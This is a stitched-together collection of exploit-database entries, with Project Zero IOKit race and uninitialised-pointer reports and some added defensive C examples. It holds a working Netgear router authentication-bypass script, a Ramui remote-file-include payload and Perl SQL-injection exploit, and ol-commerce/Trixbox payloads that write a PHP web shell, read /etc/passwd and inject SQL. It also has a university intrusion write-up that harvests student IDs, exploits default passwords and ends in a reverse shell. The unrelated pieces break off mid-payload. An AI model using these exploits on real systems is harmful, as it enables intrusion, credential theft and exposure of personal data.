
Source: https://code.google.com/p/google-security-research/issues/detail?id=605

Panic log attached

OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39362.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=606

Panic log attached

OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39361.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=607

Panic log attached

OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39360.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=608

Panic log attached

OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39359.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=618

The _ool variations of the IOKit device.defs functions all incorrectly deal with error conditions.

If you run the mig tool on device.defs you can see the source of the kernel-side MIG handling code; here
is the relevant generated code for io_service_get_matching_services_ool:

mig_internal novalue _Xio_service_get_matching_services_ool
  (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{

  ... // some typedefs

  Request *In0P = (Request *) InHeadP;
  Reply *OutP = (Reply *) OutHeadP;

  kern_return_t RetCode;
  io_object_t existing;                   <-- (a)

  ... // check the input types

  RetCode = is_io_service_get_matching_services_ool(In0P->Head.msgh_request_port, (io_buf_ptr_t)(In0P->matching.address), In0P->matchingCnt, &OutP->result, &existing);  <-- (b)

  if (RetCode != KERN_SUCCESS) {
    MIG_RETURN_ERROR(OutP, RetCode);
  }

  OutP->existing.name = (mach_port_t)iokit_make_object_port(existing);   <-- (c)


At (a) it declares an io_object_t existing on the stack (io_object_t is just a pointer). It then passes the address of that local to is_io_service_get_matching_services_ool at (b), and if that
function succeeds passes the value of existing to iokit_make_object_port at (c). Here's is_io_service_get_matching_services_ool (which importantly is NOT generated code):

    /* Routine io_service_get_matching_services_ool */
    kern_return_t is_io_service_get_matching_services_ool(
                                                          mach_port_t master_port,
                                                          io_buf_ptr_t matching,
                                                          mach_msg_type_number_t matchingCnt,
                                                          kern_return_t *result,
                                                          io_object_t *existing )
    {
        kern_return_t kr;
        vm_offset_t   data;
        vm_map_offset_t map_data;
        
        kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching );
        data = CAST_DOWN(vm_offset_t, map_data);
        
        if( KERN_SUCCESS == kr) {
            // must return success after vm_map_copyout() succeeds
            *result = internal_io_service_get_matching_services(master_port,
                                                                (const char *) data, matchingCnt, existing);
            vm_deallocate( kernel_map, data, matchingCnt );
        }
        
        return( kr );
    }

Note here that it returns kr, which *only* indicates whether the vm_map_copyout failed. That will of course succeed, so the return value of this function
will always be KERN_SUCCESS, even if internal_io_service_get_matching_services fails. Let's look at that function:

    static kern_return_t internal_io_service_get_matching_services(
                                                                   mach_port_t master_port,
                                                                   const char * matching,
                                                                   mach_msg_type_number_t matching_size,
                                                                   io_iterator_t *existing )
    {
        kern_return_t kr;
        OSObject *    obj;
        OSDictionary *  dict;
        
        if( master_port != master_device_port)
            return( kIOReturnNotPrivileged);
        
        obj = matching_size ? OSUnserializeXML(matching, matching_size)
        : OSUnserializeXML(matching);
        if( (dict = OSDynamicCast( OSDictionary, obj))) {
            *existing = IOService::getMatchingServices( dict );
            kr = kIOReturnSuccess;
        } else
            kr = kIOReturnBadArgument;
        
        if( obj)
            obj->release();
        
        return( kr );
    }

Indeed, if this function fails it doesn't set existing to a safe value, but it does return an error code. However, the _ool variation ignores this error code (it
just returns it to userspace via the result parameter). This means that the generated code thinks that is_io_service_get_matching_services_ool succeeded
and therefore passes existing to iokit_make_object_port, which will eventually (if the uninitialized value wasn't NULL) call a virtual function on it
(taggedRetain) when adding the object to the dictionary storing all IOKit user objects.

All of the _ool variations of the IOKit APIs have this problem; PoCs are included for all of them, but they may or may not crash depending on the
state of the stack.
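The defect above reduced to a user-space model, as an added example that is not from the original report or from XNU: a wrapper whose return value only reflects the copy-out step, the generated handler that trusts that return value, and a defensive variant that initialises the out-pointer and propagates the lookup error. The names ool_wrapper_buggy, ool_wrapper_fixed, mig_handler, internal_lookup and fake_object are hypothetical; only the KERN_SUCCESS == 0 convention is Mach's.

```c
/* Added example (not from the original report or XNU): a user-space model of
 * the _ool error-handling defect and a defensive fix. All names below are
 * hypothetical stand-ins for the kernel routines discussed in the text. */
#include <stddef.h>
#include <stdio.h>

typedef int kern_return_t;
#define KERN_SUCCESS 0
#define IO_BAD_ARGUMENT (-1)   /* placeholder, not the real kIOReturnBadArgument value */

typedef struct { const char *name; } fake_object;
typedef fake_object *io_object_t;

static fake_object the_service = { "matched-service" };

/* Stand-in for internal_io_service_get_matching_services(): on bad input it
 * returns an error and, like the original, leaves *existing untouched. */
static kern_return_t internal_lookup(const char *matching, io_object_t *existing) {
    if (matching == NULL || matching[0] != '<')   /* "does not unserialize to a dictionary" */
        return IO_BAD_ARGUMENT;
    *existing = &the_service;
    return KERN_SUCCESS;
}

/* Mirrors is_io_service_get_matching_services_ool: the return value only
 * reflects the copy-out step (always successful here); the lookup's error is
 * parked in *result, which the generated handler never consults. */
kern_return_t ool_wrapper_buggy(const char *matching, kern_return_t *result,
                                io_object_t *existing) {
    kern_return_t kr = KERN_SUCCESS;             /* vm_map_copyout() outcome */
    *result = internal_lookup(matching, existing);
    return kr;
}

/* Defensive variant: the out-pointer is never left indeterminate, and the
 * lookup failure is surfaced through the return value the handler checks. */
kern_return_t ool_wrapper_fixed(const char *matching, kern_return_t *result,
                                io_object_t *existing) {
    *existing = NULL;
    *result = internal_lookup(matching, existing);
    return *result;
}

typedef kern_return_t (*ool_fn)(const char *, kern_return_t *, io_object_t *);

/* Models the generated _Xio_service_get_matching_services_ool handler.
 * stack_garbage plays the role of whatever the uninitialised local
 * `existing` happens to contain. Returns the object that would reach
 * iokit_make_object_port(), or NULL when the error path is taken. */
io_object_t mig_handler(ool_fn wrapper, const char *matching, io_object_t stack_garbage) {
    kern_return_t result;
    io_object_t existing = stack_garbage;        /* (a): uninitialised local */
    if (wrapper(matching, &result, &existing) != KERN_SUCCESS)   /* (b) */
        return NULL;                             /* MIG_RETURN_ERROR */
    return existing;                             /* (c) */
}

int main(void) {
    fake_object garbage = { "stale-stack-value" };
    io_object_t a = mig_handler(ool_wrapper_buggy, "bogus", &garbage);
    io_object_t b = mig_handler(ool_wrapper_fixed, "bogus", &garbage);
    printf("buggy handler would use: %s\n", a ? a->name : "(error path)");
    printf("fixed handler would use: %s\n", b ? b->name : "(error path)");
    return 0;
}
```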


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39358.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=620

I wanted to demonstrate that these iOS/OS X kernel race conditions really are exploitable, so here's a PoC
which gets RIP on OS X. The same techniques should transfer smoothly to iOS :)

The bug is here:

void IORegistryIterator::reset( void )
{
    while( exitEntry())
    {}
    
    if( done) {
        done->release();
        done = 0;
    }
    
    where->current = root;
    options &= ~kIORegistryIteratorInvalidFlag;
}

We can call this from userspace via the IOIteratorReset method.

done is an OSOrderedSet* and we only hold one reference on it; therefore we can race two threads
to both see the same value of done: one will free it, but before it sets done to NULL the other will
call ->release on the now freed OSOrderedSet.

How to get instruction pointer control?

The XNU kernel heap seems to have been designed to make this super easy :) When the first thread frees
done zalloc will overwrite the first qword of the allocation with the freelist next pointer (and the last qword
with that pointer xor'd with a secret.) This means that what used to be the vtable pointer gets overwritten
with a valid pointer pointing to the last object freed to this zone. If we can control that object then
the qword at +0x28 will be called (release is at offset +0x28 in the OSObject vtable which is the base
of all IOKit objects including OSOrderedSet.)

This PoC uses OSUnserializeXML to unserialize an OSData object with controlled contents then free it, which
puts a controlled heap allocation at the head of the kalloc.80 freelist giving us pretty easy instruction pointer control.

I've attached a panic log showing kernel RIP at 0xffffff8041414141. You will probably have to fiddle with the
PoC a bit to get it to work, it's only a PoC but it does work! (I have marked the value to fiddle with :) )

As a hardening measure I would strongly suggest at the very least flipping the location of the obfuscated and
unobfuscated freelist pointers such that the valid freelist pointer doesn't overlap with the location of the
vtable pointer.
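The reset() race modelled in user space, as an added example that is not from the original report or from XNU: a deterministic replay of the interleaving described above (both callers pass the `if (done)` test with the same pointer), next to a take-and-clear reset guarded by a mutex so that only one caller ever owns the reference it releases. The names set_t, iter_t, reset_safe and the simulate_* functions are hypothetical; pthread is used only for the mutex and no threads are spawned.

```c
/* Added example (not from the original report or XNU): a mock of
 * IORegistryIterator::reset() showing the single-reference race and a
 * lock-protected take-and-clear that closes it. Names are hypothetical. */
#include <pthread.h>
#include <stdio.h>

typedef struct { int refcount; } set_t;     /* stands in for OSOrderedSet */
static int frees;                           /* times a set hit refcount 0 */
static int bad_releases;                    /* release() on an already freed set */

static void set_release(set_t *s) {
    if (s->refcount <= 0) { bad_releases++; return; }   /* use after free */
    if (--s->refcount == 0) frees++;        /* real code would free(s) here */
}

typedef struct { set_t *done; pthread_mutex_t lock; } iter_t;

/* Replays the race: both callers pass `if (done)` with the same pointer
 * before either one has stored done = 0. Returns the number of releases
 * that landed on the already freed set (1). */
int simulate_unsafe_interleaving(void) {
    set_t set = { 1 };                      /* the single reference the iterator holds */
    iter_t it = { &set, PTHREAD_MUTEX_INITIALIZER };
    frees = bad_releases = 0;
    set_t *seen_by_a = it.done;             /* thread A: if (done) { ... */
    set_t *seen_by_b = it.done;             /* thread B: same test, same pointer */
    set_release(seen_by_a); it.done = NULL; /* A: done->release(); done = 0; */
    set_release(seen_by_b); it.done = NULL; /* B: release() on the freed set */
    return bad_releases;
}

/* Hardened reset: ownership of the reference leaves the iterator under the
 * lock, so a concurrent second caller finds NULL and releases nothing. */
static void reset_safe(iter_t *it) {
    pthread_mutex_lock(&it->lock);
    set_t *d = it->done;
    it->done = NULL;
    pthread_mutex_unlock(&it->lock);
    if (d) set_release(d);
}

/* Two resets through the guarded path (sequential here; under real
 * concurrency the mutex makes the take-and-clear atomic). Returns the
 * number of releases on a freed set (0); exactly one free happens. */
int simulate_safe_resets(void) {
    set_t set = { 1 };
    iter_t it = { &set, PTHREAD_MUTEX_INITIALIZER };
    frees = bad_releases = 0;
    reset_safe(&it);
    reset_safe(&it);
    return bad_releases;
}

int main(void) {
    int unsafe_bad = simulate_unsafe_interleaving();
    printf("unsafe interleaving: %d release(s) on a freed set\n", unsafe_bad);
    int safe_bad = simulate_safe_resets();
    printf("guarded reset: %d release(s) on a freed set, %d free(s)\n", safe_bad, frees);
    return 0;
}
```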


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39357.zip
            
'''
# Exploit Title: Netgear_WNR1000v4_AuthBypass
# Google Dork: -
# Date: 06.10.2015
# Exploit Author: Daniel Haake
# Vendor Homepage: http://www.netgear.com/
# Software Link: http://downloadcenter.netgear.com/en/product/WNR1000v4
# Version: N300 router firmware versions 1.1.0.24 - 1.1.0.31
# Tested on: Can be exploited using a browser
# CVE : requested


Introduction:
-------------
Multiple NETGEAR wireless routers are vulnerable out of the box
to an authentication bypass attack. No router options have to
be changed to exploit the issue, so an attacker can access the administration
interface of the router without submitting any valid username and
password, just by requesting a special URL several times.


Affected:
---------
- Router Firmware: N300_1.1.0.31_1.0.1.img
- Router Firmware: N300-1.1.0.28_1.0.1.img
- Router Firmware: N300-1.1.0.24_1.0.1.img
- tested and confirmed on the WNR1000v4 Router with both firmwares
- other products may also be vulnerable because the firmware is used in multiple devices


Technical Description:
----------------------
The attacker can exploit the issue by using a browser or by writing a simple exploit:
1. When a user wants to access the web interface, an HTTP basic authentication login process is initiated.
2. If he does not know the username and password, he gets redirected to the 401_access_denied.htm file.
3. An attacker now has to call the URL http://<ROUTER-IP>/BRS_netgear_success.html multiple times.
-> After that he can access the administration web interface, and there is no username/password prompt.


Example Python script:
----------------------
'''

import os
import urllib2
import time
import sys

# Usage: python <this script> <ROUTER-IP>
if len(sys.argv) < 2:
	print "Usage: %s <ROUTER-IP>" % sys.argv[0]
	sys.exit(1)

try:
	# A 401 from the router raises an HTTPError here
	first = urllib2.urlopen("http://" + sys.argv[1])
	print "No password protection!"
except:
	print "Password protection detected!"
	print "Executing exploit..."
	# Step 3 above: request the special URL a few times
	for i in range(0, 3):
		time.sleep(1)
		urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")

	# Step 4: the admin interface now answers without a credential prompt
	second = urllib2.urlopen("http://" + sys.argv[1])
	if second.getcode() == 200:
		print "Bypass successful. Now use your browser to have a look at the admin interface."

'''
Workaround/Fix:
---------------
None so far. Netgear has already developed a patch fixing this vulnerability but has not released it yet
(see timeline below).


Timeline:
---------
Vendor status: working on a patch release
'''
21.07.2015: Vendor notified per email (security@netgear.com)
            -> No response
23.07.2015: Vendor notified via official chat support
24.07.2015: Support redirected notification to the technical team
29.07.2015: Requested status update and asked if they need further assistance
            -> No response
21.08.2015: Notified vendor that we will go full disclosure within 90 days if they do not react
03.09.2015: Support again said that they will redirect it to the technical team
03.09.2015: Netgear sent some beta firmware version to look if the vulnerability is fixed
03.09.2015: Confirmed to Netgear that the problem is solved in this version
            Asked Netgear when they plan to release the firmware with this security fix
11.09.2015: Response from Netgear saying they will not disclose the patch release day
15.09.2015: Asked Netgear again when they plan to publish the security fix for the second time
            -> No response
29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
06.10.2015: Forced public release of this advisory to follow up on [2]


References:
-----------
[1] http://support.netgear.com/product/WNR1000v4
[2] http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html
            
# Title: Ramui web hosting directory script 4.0 Remote File Include Vulnerability
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com
# Download: http://ramui.com/directory-script/download-v4.html

Proof-of-Concept:
/gb/include/connection.php lines 6-13 in php-sourcecode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class connection
{
protected $site;
public $error=false;
protected $admin=false;
function __construct($root)
{
        include $root."database/config.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The $root parameter belongs to __construct,
but no value is passed to it.
Therefore nothing can be checked before the include in line 13,
so an attacker can execute malicious shellcode through it.
In this case the __construct is meaningless.


[+]Exploit: http://[server]/path/gb/include/connection.php?root=[YourShellcode]


~~Everything revolves. Even the planet. :)~~
***Greetz to ALL my followers on Twitter!***

/bd0rk
            

0x01 Information gathering

First, the assigned target is the official website of xxx University, wwwww.xxx.edu.cn, but in practice you shouldn't test only the main site. A main site like this is usually relatively secure and may be part of a site-group system; many schools use unified management by Boda.

1. Subdomain collection

Tools such as subdomain3, FuzzDomain, subDomainsBrute and Seay's subdomain tool can be used to brute-force subdomain names.

However, I didn't use any of those in this engagement; the brute-forcing took too long.

I use FOFA, Shodan and similar cyberspace search engines instead.

For example, the following query:

host='xxxx.edu.cn'

2. Port information

From the FOFA results above you can learn the IP address and scan it with a port scanning tool. No usable ports were found.

However, many websites sit on this IP.

So I gave up on the ports.

3. Sensitive information collection

Searching GitHub, Google hacking and the Lingfengyun network disk search, I didn't collect anything sensitive. The mail addresses are Tencent enterprise mail addresses, and the VPN looks like this:

Some of the collected mail accounts were as follows:

Browsing the website turned up the entrances to several intranet systems.

From the prompt on the unified authentication platform, a little social engineering tells us that students can log in with their student number plus their ID card number (the default password).

So I collected a batch of student numbers as a backup:

site:xxx.edu.cn student ID

0x02 Vulnerability mining

After collecting some of the information I needed, I started digging into each subdomain. After a long search, most systems turned out to use a unified template with fairly limited functionality, and no holes were found.

site:xxx.edu.cn inurl:login

site:xxx.edu.cn intitle:login

Then I focused on some of the login systems.

After that I found a system to log in to.

At this point I remembered its prompt: the username and password are the work number. That means there may be teacher work-number information here, but I simply got lucky: the system administrator account of this system has a weak password.

After the administrator enters the backend, find the user information and learn that teacher accounts are five digits. You can see there is an action in the address bar. After testing str2, I refreshed the page and it wouldn't open; I found that my IP had been blocked...

Then, knowing the user naming rule, I wrote a script to generate a dictionary as a backup:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# DateTime: 2019/7/10 8:44

begin_num = 0      # number to start generating from
end_num = 20000    # number to stop at (inclusive)

print('''
After the script runs, 5.txt is created in the script's directory and holds the generated numbers.
''')

# Zero-pad every number to five digits (the observed teacher account format)
for i in range(begin_num, end_num + 1):
    if i < 10:
        i = '0000' + str(i)
    elif i < 100:
        i = '000' + str(i)
    elif i < 1000:
        i = '00' + str(i)
    elif i < 10000:
        i = '0' + str(i)
    with open('5.txt', 'a') as f:
        f.write(str(i) + '\n')

print('Program finished, file generated')

Then I looked for injection and file upload in this backend, but it was fruitless, so I noted it in a text file and moved on to another domain name.

Next, look at the course selection system.

Using the student account as both the account and the password logs in successfully.

It doesn't seem useful, but what annoyed me about it was that when I tried an upload test, I changed the script suffix and the data packet could not be sent. As a result I went back to the web page to refresh, and the connection was reset... Yes, my IP had been banned again.

Then I tried to crack teacher accounts, and the same account was used as the password there too.

After getting in, I looked around but still couldn't make progress.

Similarly, I got into the graduate management system and the student payment query system (actually just a query...), and finally made a little progress in the Financial XX system.

Yes, you read that right, it reads out the ID number, so I brainlessly tried it 100 times and got 14 teacher accounts with their ID cards, but they all look like retired teachers.

Then I went to the unified identity authentication platform to try to log in, and it worked... (academic affairs could not log in)

This is where it started, and it counts as a breakthrough, because some systems here cannot be opened without authentication, such as this breakthrough point: the apartment management system.

Opened before authentication:

Opened after authentication:

Actually there's no permission... Clicking login again gives access to this system, which also proves that this system is available to users who have logged in to the unified authentication platform. It then turns out that this system has a Java deserialization vulnerability.

Through this deserialization vulnerability (Shiro deserialization), a reverse shell was obtained, and the machine runs as root.

After that it's a matter of proxying traffic into the network behind it. I won't waste more words here.

Then I ran into a WAF I had never seen before.

Surprise: a second master was guarding the site, so I retreated. Sorry for the disturbance.

0x03 Summary

1. Information gathering. Subdomains: FOFA (host='xxxx.edu.cn'). Ports: Yujian scanning tool; the website only exposes ports 443 or 80 through a reverse proxy. Sensitive information: network disks (Baidu Network Disk and Tencent Network Disk).
2. Google hacking to collect student numbers: site:xxx.edu.cn student number. Login pages: site:xxx.edu.cn inurl:login or site:xxx.edu.cn intitle:login.
3. Discovered that the unified authentication platform uses the work number and ID card: log in with the work number and the last 6 digits of the ID card.
4. Discovered that the assets and laboratory platform uses the work number as both username and password; here the weak password admin/admin gets into the system, where teacher work numbers can be obtained. The system's upload is intercepted by the WAF.
5. Course selection center: both the account and the password are the student number or the teacher's work number. The system's file upload is also intercepted by the WAF.
6. Other systems such as the graduate management system, the student payment query system and the Financial XX system all use the work number as account and password, so they can be entered; the ID numbers bound to teacher accounts can be collected there.
7. With a teacher's account and ID number, enter the unified authentication platform; the dormitory management system can then be logged in to (prerequisite: log in to the unified authentication system first).
8.

# Title: Ramui forum script 9.0 SQL Injection Exploit
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com/
# Download: http://ramui.com/forum-script/download-v9.html
# Google-Dork: n/a --->Script-Kiddie protection! :)
# Direct SQL-Path: n/a --->Script-Kiddie protection! :)

# Description: I've found a sql-injection vulnerability in this web-software.
#             The vulnerable code is in /gb/include/page.php
#             The problem is the GET-pagename.
#             An attacker can use this exploitcode for unfiltered sql-queries.

                                      


#                                                    Vuln-Code in /gb/include/page.php:
#************************************************************************************************************************************
# <?php
# if(isset($_GET['pagename'])){
#	$name=$_GET['pagename'];
#	$query=sprintf("SELECT* FROM ".PREFIX."page WHERE pagename = '%s' AND publish = 'Y'",$xx_con->real_escape_string($name));
# }
#************************************************************************************************************************************



# [+]PERL-EXPLOITCODE(Copy&Paste):


#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+   Ramui forum script 9.0 SQL Injection Exploit     +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+            Greetings from cold Germany             +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /ramui/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "gb/include/page.php?pagename=[sqlInjectionCodeHERE]".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
            
#####################################################################################

Application: VLC media player

Platforms: Windows

Versions: Version 2.2.1

Author: Francis Provencher of COSIG

Website: http://www.protekresearchlab.com/

Twitter: @COSIG_

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

VLC media player (commonly known as VLC) is a portable, free and open-source, cross-platform media player and streaming media server written by the VideoLAN project. VLC is available for desktop operating systems as well as mobile platforms such as Android, iPad, iPhone, and iPod Touch. VLC is also available on app stores such as Apple's App Store. VLC media player supports many audio and video compression methods and file formats, including DVD-Video, video CD and streaming protocols. It is able to stream media over computer networks and to transcode multimedia files.

(https://en.wikipedia.org/wiki/VLC_media_player)

#####################################################################################

============================
2) Report Timeline
============================

2016-01-26: Francis Provencher from Protek Research Lab reports the issue to VLC;
2016-01-27: Publication of this advisory;

#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of VLC.

User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

A heap memory corruption occurs when VLC parses a malformed MPEG-4 file that contains an invalid Sample Table Sample Description (STSD) atom size. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current process.
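The size check whose absence the advisory describes, as an added example that is not VLC's code: a minimal MPEG-4 box walker that rejects any atom whose declared size is smaller than its header or larger than the bytes remaining in its parent, and that checks the stsd atom's entry_count against the entries actually present. The helper names (walk_boxes, is_container, be32) and the sample byte arrays are constructed for this example.

```c
/* Added example (not VLC's code): a minimal MPEG-4 box walker that checks
 * every atom size before trusting it, and validates the stsd atom's
 * entry_count against the entries actually present. The sample byte
 * arrays below are constructed, not taken from the advisory's file. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static int is_container(const uint8_t *type) {
    static const char *const kinds[] = { "moov", "trak", "mdia", "minf", "stbl" };
    for (size_t i = 0; i < sizeof kinds / sizeof kinds[0]; i++)
        if (memcmp(type, kinds[i], 4) == 0) return 1;
    return 0;
}

/* Walks the boxes in buf[0..len) at one nesting level. Returns the number of
 * boxes found, or -1 as soon as an atom declares a size smaller than its
 * 8-byte header, larger than the bytes remaining, or an stsd whose
 * entry_count does not match its contents. */
int walk_boxes(const uint8_t *buf, size_t len, int depth) {
    size_t off = 0;
    int count = 0;
    if (depth > 8) return -1;                        /* absurd nesting */
    while (off < len) {
        if (len - off < 8) return -1;                /* truncated header */
        uint32_t size = be32(buf + off);
        const uint8_t *type = buf + off + 4;
        if (size == 0) size = (uint32_t)(len - off); /* "extends to end" */
        if (size == 1) return -1;                    /* 64-bit largesize: not handled here */
        if (size < 8 || size > len - off) return -1; /* the size sanity check */
        const uint8_t *body = buf + off + 8;
        size_t body_len = size - 8;
        if (is_container(type)) {
            if (walk_boxes(body, body_len, depth + 1) < 0) return -1;
        } else if (memcmp(type, "stsd", 4) == 0) {
            if (body_len < 8) return -1;             /* version/flags + entry_count */
            uint32_t entry_count = be32(body + 4);
            int entries = walk_boxes(body + 8, body_len - 8, depth + 1);
            if (entries < 0 || (uint32_t)entries != entry_count) return -1;
        }
        off += size;
        count++;
    }
    return count;
}

/* Constructed: an stbl holding a well-formed stsd with one (empty) mp4a entry. */
const uint8_t good_stbl[] = {
    0x00,0x00,0x00,0x20,'s','t','b','l',
    0x00,0x00,0x00,0x18,'s','t','s','d',
    0x00,0x00,0x00,0x00,                  /* version + flags */
    0x00,0x00,0x00,0x01,                  /* entry_count = 1 */
    0x00,0x00,0x00,0x08,'m','p','4','a',
};
/* Constructed: stsd claims 72 bytes while only 24 remain in the parent. */
const uint8_t oversized_stsd[] = {
    0x00,0x00,0x00,0x20,'s','t','b','l',
    0x00,0x00,0x00,0x48,'s','t','s','d',
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x01,
    0x00,0x00,0x00,0x08,'m','p','4','a',
};
/* Constructed: stsd claims 4 bytes, less than its own header. */
const uint8_t undersized_stsd[] = {
    0x00,0x00,0x00,0x20,'s','t','b','l',
    0x00,0x00,0x00,0x04,'s','t','s','d',
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x01,
    0x00,0x00,0x00,0x08,'m','p','4','a',
};
/* Constructed: entry_count says 2 but only one entry is present. */
const uint8_t miscounted_stsd[] = {
    0x00,0x00,0x00,0x20,'s','t','b','l',
    0x00,0x00,0x00,0x18,'s','t','s','d',
    0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x02,
    0x00,0x00,0x00,0x08,'m','p','4','a',
};

int main(void) {
    printf("good_stbl: %d\n", walk_boxes(good_stbl, sizeof good_stbl, 0));
    printf("oversized_stsd: %d\n", walk_boxes(oversized_stsd, sizeof oversized_stsd, 0));
    printf("undersized_stsd: %d\n", walk_boxes(undersized_stsd, sizeof undersized_stsd, 0));
    printf("miscounted_stsd: %d\n", walk_boxes(miscounted_stsd, sizeof miscounted_stsd, 0));
    return 0;
}
```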

#####################################################################################

===========
4) POC
===========

http://protekresearchlab.com/exploits/COSIG-2016-03.mp4
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39353.zip

###############################################################################
            
source: https://www.securityfocus.com/bid/68719/info
        
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
        
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
        
ol-commerce 2.1.1 is vulnerable; other versions may also be affected. 

Http://www.example.com/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php

Your Shell

Http://www.example.com/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
            
source: https://www.securityfocus.com/bid/68719/info
       
Http://www.example.com/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
            
source: https://www.securityfocus.com/bid/68719/info
      
Http://www.example.com/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00
            
source: https://www.securityfocus.com/bid/68719/info
     
Http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00
            
source: https://www.securityfocus.com/bid/68719/info
    
Http://www.example.com/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00
            
source: https://www.securityfocus.com/bid/68720/info

Trixbox is prone to the following security vulnerabilities:

1. An SQL-injection vulnerability
2. A cross-site scripting vulnerability
3. Multiple local file-include vulnerabilities
4. A remote code-execution vulnerability

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, to steal cookie-based authentication credentials, exploit latent vulnerabilities in the underlying database or perform certain unauthorized actions and gain access to the affected application. 

Http://www.example.com/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1' and 1=2 union select 1,2,3,4,5,6-- -
            
source: https://www.securityfocus.com/bid/68719/info
   
http://www.example.com/OL-Commerce/admin/create_account.php?action=edit

POST /OL-Commerce/admin/create_account.php?action=edit  HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://www.example.com/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[SQL INJECTION]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=

[NOTE]
------
entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select
